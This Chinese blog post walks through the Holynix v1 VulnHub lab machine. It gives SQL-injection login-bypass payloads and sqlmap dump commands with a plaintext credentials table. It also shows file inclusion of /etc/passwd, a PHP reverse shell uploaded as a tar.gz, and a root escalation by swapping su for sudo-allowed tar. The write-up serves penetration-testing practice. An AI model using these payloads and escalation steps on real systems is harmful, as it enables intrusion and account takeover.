holynix

最新推荐文章于 2024-10-10 20:08:05 发布
最新推荐文章于 2024-10-10 20:08:05 发布
阅读量118 收藏
点赞数 2
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58788294/article/details/142754967
版权

靶机下载

https://download.vulnhub.com/holynix/holynix-v1.tar.bz2
更换靶机为NAT模式,若是还扫不到ip可以将mac地址改为
00:0C:29:BC:05:DE

启动靶机

扫描靶机ip

arp-scan -l

对靶机进行端口扫描

nmap 192.168.5.148/24
发现开放80端口

进行web访问

访问80端口
http://192.168.5.148/

发现有login页面,访问login页面
发现有登录框,进行burp抓包
发现输入框中输入'会进行报错,证明有sql注入

发现有sql注入漏洞,用sqlmap跑一下

方法一:
通过报错信息可以看到,这个sql查询语句对Name字段的单引号进行了转义(\'),
而Password没有。因此Name随便输,Password用万能密码即可登录
Name:admin
password:' or 1=1 #

方法二:
用sqlmap对网站进行爆破,爆出账号和密码
--dbs      											查看所有数据库
--current-db 										查看当前数据库
-D creds --tables								查看数据表
-D creds -T accounts --dump 		查看表中数据

+-----+--------+--------------------+------------+
| cid | upload | password           | username   |
+-----+--------+--------------------+------------+
| 1   | 0      | Ih@cK3dM1cR05oF7   | alamo      |
| 2   | 1      | P3n7@g0n0wN3d      | etenenbaum |
| 3   | 1      | d15cL0suR3Pr0J3c7  | gmckinnon  |
| 4   | 1      | Ik1Ll3dNiN@r315er  | hreiser    |
| 5   | 1      | p1@yIngW17hPh0n35  | jdraper    |
| 6   | 1      | @rR35t3D@716       | jjames     |
| 7   | 1      | m@k1nGb0o7L3g5     | jljohansen |
| 8   | 1      | wH@7ar37H3Fed5D01n | kpoulsen   |
| 9   | 0      | f@7H3r0FL1nUX      | ltorvalds  |
| 10  | 1      | n@5aHaSw0rM5       | mrbutler   |
| 11  | 1      | Myd@d51N7h3NSA     | rtmorris   |
+-----+--------+--------------------+------------+

登录成功

登录alamo成功后,在左侧边栏有多个选项,发现有文件上传功能
尝试上传文件,发现用户alamo的权限不够

发现还有Email,尝试进行抓包
尝试进行文件包含/etc/passwd
发现确实有文件包含漏洞

用户alamo上传文件失败,尝试换其他用户进行上传

方法一:
Name:a
Password:' or username='etenenbaum' #
# 完整的查询语句:
SELECT * FROM accounts WHERE username='a' AND password='' or username='etenenbaum' #'
方法二:
etenenbaum:P3n7@g0n0wN3d

上传文件

发现可以上传成功
在etenenbaum的家目录
http://192.168.5.148/~etenenbaum/寻找这个文件,然后尝试点击,看看能否打开
发现无法打开权限不够

在上传文件中可以得知,上传压缩包会自动解压

cd Desktop
locate php-reverse
cp /usr/share/laudanum/php/php-reverse-shell.php .
vim php-reverse-shell.php
ip改为kali自己的ip

文件无法直接打开,将php文件进行压缩
tar czf shell.tar.gz php-reverse-shell.php (在kali中打开网站上传)

上传时勾选解压
成功进行监听

权限提升

先用python升级shell
python -c "import pty;pty.spawn('/bin/bash')"

然后开始提权,先查看当前权限
sudo -l

可以看到,我们可以免密用sudo执行
chown,chgrp,tar,mv这几个命令。
那么我们可以用tar命令替换为su来提权,
相当于运行sudo tar就是运行sudo su,因为su被我们改名成了tar,然后tar又可以被我们sudo免密运行
sudo mv /bin/tar /bin/tar.orgi
sudo mv /bin/su /bin/tar
sudo tar

提权成功!!!!!!!!

归丨禾
关注
Holynix
weixin_44770698的博客
12-08 463
靶场练习
Holynix靶机
2401_84564260的博客
07-29 342
点击login,发现用户登录,使用弱口令测试一下,登陆不上,测试SQL。更改文件 /tmp/bash 的所有权,以便从此 root 成为所有者。执行命令 /bin/tar(理想情况下运行 /bin/bash)将现有的 /bin/tar 文件备份到 bin/tar.bak。现在将 /tmp/bash 文件移动到 /bin/tar。点击Message Board,发现留言板,测试xss。将 /bin/bash 文件复制到 /tmp 文件夹。访问192.168.154.146。上传一个php文件,不让上传。
holynix靶机渗透测试
weixin_58786230的博客
07-29 516
【代码】holynix靶机渗透测试。
holynix-v1靶机
hqy250019的博客
07-12 443
抓包,尝试水平越权,把id改为其他的,因为刚刚在username中看到很多用户。点击login,发现用户登录,使用弱口令测试一下,登陆不上,测试SQL。点击Message Board,发现留言板,测试xss。点击Security,F12发现可能存在文件包含。修改时在关机状态下修改,修改好后打开。访问192.168.111.148。点击Directory,发现有用户。上传页面有个上传压缩包,自动解压。nc -lvnp 5555监听。上传一个php文件,不让上传。发现上传成功,并且用户也变了。
vulnhub靶场/holynix
qq_45230030的博客
04-16 1059
分享一下之前vulnhub的打靶记录
VulnHub:holynix:v1
wbplife的博客
07-12 503
注意:下载成功后用vmware打开,跳出提示框请选择“我已移动该虚拟机”,然后设置为NAT模式,否则无法扫描到靶机!
靶机精讲之Holynix
m0_63285023的博客
04-17 700
找不到ip就设置两个网络适配器再添加一个NAT。
holynix v1超详细靶场实战
weixin_68615160的博客
07-30 808
搭好后发现扫描不到主机,更换一下mac地址。
Holynix-v1打靶渗透(权限提升)
weixin_52487093的博客
07-30 431
【代码】Holynix-v1打靶渗透(权限提升)
Vulnhub靶机:HOLYNIX_ V1
LainWith的博客
12-23 2368
Holynix(此系列共2台)发布日期:2010年11月27日难度:中运行环境:VMware Workstation目标:取得 root 权限补充:需要手工设置靶机的MAC为00:0c:29:bc:05:de,然后重启靶机才能获取到靶机IP主机发现端口扫描+漏洞扫描万能密码文件包含漏洞mv提权。
Holynix-开源
07-01
与 de-ice pentest CD 和 pWnOS 类似,Holynix 是一个 Linux vmware 映像,它被故意构建为具有安全漏洞以进行渗透测试。 访问 http://pynstrom.com/forum/ 以获得设置或完成挑战的帮助。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
10-10 899
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 646
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
《网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 214
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
【网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 393
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全——防火墙、IDS和IPS
L752034395的博客
10-02 914
网络安全,防火墙,包过滤、状态检测、应用层网关;入侵检测系统,IDS;入侵防御系统,IPS
2024年网络安全进阶学习路径-2024年进阶学习指南
2401_85026965的博客
10-10 1240
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
等保测评:如何建立有效的网络安全监测系统
最新发布
2301_79955948的博客
10-10 448
通过上述步骤,可以建立一个符合等保测评要求的有效网络安全监测系统,确保网络系统的安全稳定运行,并满足国家网络安全法规的要求。:在网络安全监测系统的建设中,既要关注网络安全技术的实施,如防火墙、入侵检测系统,也要重视安全管理制度的建立,如安全策略、应急响应计划。:首先,需要根据信息系统的安全性要求、资产的重要性和风险程度等因素,确定网络系统的安全等级,并选择相应的等保测评标准和方法。:根据测评和渗透测试的结果,对网络安全监测系统进行必要的整改和优化,以确保其完全符合等保的要求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值